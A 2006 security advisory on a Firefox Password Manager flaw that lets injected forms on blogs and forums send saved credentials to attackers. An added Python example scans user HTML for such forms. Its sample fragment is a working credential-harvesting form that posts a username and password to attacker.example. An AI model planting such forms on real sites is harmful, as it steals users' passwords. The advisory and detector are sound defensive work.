11/21/2006 — Chapin Information
Services (CIS) has discovered a new flaw
in the Mozilla Firefox web browser that exposes saved passwords to clever attackers.
Given the new nature of this type of attack, CIS has named this a
Reverse Cross-Site Request (RCSR) vulnerability.
This flaw could affect anyone visiting a weblog or forum website that allows
user-contributed HTML to be added.
A proof-of-concept demonstration is available at the CIS website.
RCSR attacks are also actively targeting Microsoft Internet Explorer;
however, a flaw in Firefox makes the attack much more likely to succeed.
The Password Manager component of Firefox can be exploited to send a
username and password combination to an attacker's computer without the user's knowledge.
Users of both Firefox and Internet Explorer need to be aware that their information
can be stolen in this way when visiting blog and forum websites at trusted addresses.
A recent large-scale attack using RCSR targeted MySpace.com users and was
first reported by Netcraft on 10/27/2006.
That incident involved fake login forms
on the MySpace website inviting users to type in their username and password.
Forms and links have been used in a similar way to carry out Cross-Site
Request Forgery (CSRF) attacks. The difference between CSRF and this new breed
of RCSR attacks is the direction of data flow.
CSRF attacks are commonly used to add content to a blog or forum without
the user's knowledge. This can be done by "forging" a link or form that the
website does not correctly verify with the user.
RCSR, by contrast, takes content from the blog or forum by creating a form
on the website directed back to the attacker.
The RCSR attack is much more likely to succeed because neither Internet Explorer
nor Firefox is designed to check the destination of form data before the user submits it.
The user sees a trusted website address in the browser's address bar because the
exploit is conducted at the trusted website.
On 11/12/2006, CIS reported to Mozilla that the Firefox web browser will
automatically fill saved usernames and passwords into such RCSR forms. This behavior
does not occur in Internet Explorer unless the RCSR form appears on the same page
as a legitimate login form.
Exacerbating this problem is the fact that forms can be completely hidden
from view. As demonstrated in the CIS proof-of-concept, after saving a website
password in Firefox, it is possible for that password to be transmitted to another
website by unwittingly clicking on an invisible image link.
Mozilla confirmed this as bug number 360493, and said they are already
working on a fix for version 2.0.0.1 or 2.0.0.2.
Suggestions have been made about the benefits of website changes as well
as browser updates to combat RCSR problems. These are increasingly valid concerns
for webmasters. However, a flawed Password Manager will have to be fixed by the
authors. CIS has recommended several changes to both Firefox and Internet Explorer.
Microsoft responded by saying, "We are aware of the issue you reported," and,
"As a matter of policy, we cannot comment on ongoing investigations."
Webmasters need to be aware of the implications of RCSR forms and how they
work once added to a website. No client-side scripting is needed to steal information
in this way, so this is not a Cross-Site Scripting (XSS) attack.
CIS recommends all webmasters review server code for the possibility of XSS
and RCSR injections, especially operators of encrypted websites. These attacks could
be highly effective against firewalled local network servers and HTTPS addresses that
are not otherwise accessible because the attacker does not need direct access.
In theory, combined CSRF and RCSR injections could change the appearance
of a website and steal the user's password, even if scripts are filtered from
user data.
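A server-side check of the kind the recommendation above calls for, added here as an example (not CIS, Mozilla or Microsoft code): it scans a user-contributed HTML fragment for the form markup an RCSR injection needs and flags any action that posts to a host other than the site's own, alongside the script-only filter the article says is not enough. The site hostname, helper names and the sample fragment are this example's own constructions.

```python
"""Added example: flag RCSR-style form injection in user-contributed HTML.
A <form> posting off-site carries no script, so a script-only filter lets it
through, and a browser that auto-fills saved credentials hands them over.
Site hostname, helper names and the sample fragment are constructed here."""
from html.parser import HTMLParser
from urllib.parse import urlparse

FORM_TAGS = {"form", "input", "button", "select", "textarea"}
ACTION_ATTRS = ("action", "formaction")  # formaction is the HTML5 variant

class RcsrScanner(HTMLParser):
    """Collects indicators of credential-harvesting forms in a fragment."""

    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser already lowercases tag/attr names
        if tag in FORM_TAGS:
            self.findings.append(f"form element <{tag}> in user content")
        if tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.findings.append("password field in user content")
        for name in ACTION_ATTRS:
            if name not in attrs:
                continue
            host = urlparse(attrs[name] or "").netloc.lower()
            # A relative action posts back to this site; an absolute one
            # naming another host is the RCSR signature.
            if host and host != self.site_host:
                self.findings.append(f"{name} posts to foreign host {host}")

def scan_fragment(fragment, site_host):
    """Return the RCSR indicators found in a user-contributed HTML fragment."""
    scanner = RcsrScanner(site_host)
    scanner.feed(fragment)
    scanner.close()
    return scanner.findings

def script_only_filter_passes(fragment):
    """The insufficient check the article warns about: it looks for scripts only."""
    return "<script" not in fragment.lower()

# Constructed sample: no script at all, yet a credential harvester.
SAMPLE = ('<p>Great post!</p>'
          '<form action="https://attacker.example/collect" method="post">'
          '<input name="username"><input type="password" name="password">'
          '<input type="image" src="blank.gif"></form>')
```

Running `scan_fragment(SAMPLE, "blog.example")` reports the form, the password field and the foreign action host, while `script_only_filter_passes(SAMPLE)` accepts the same fragment.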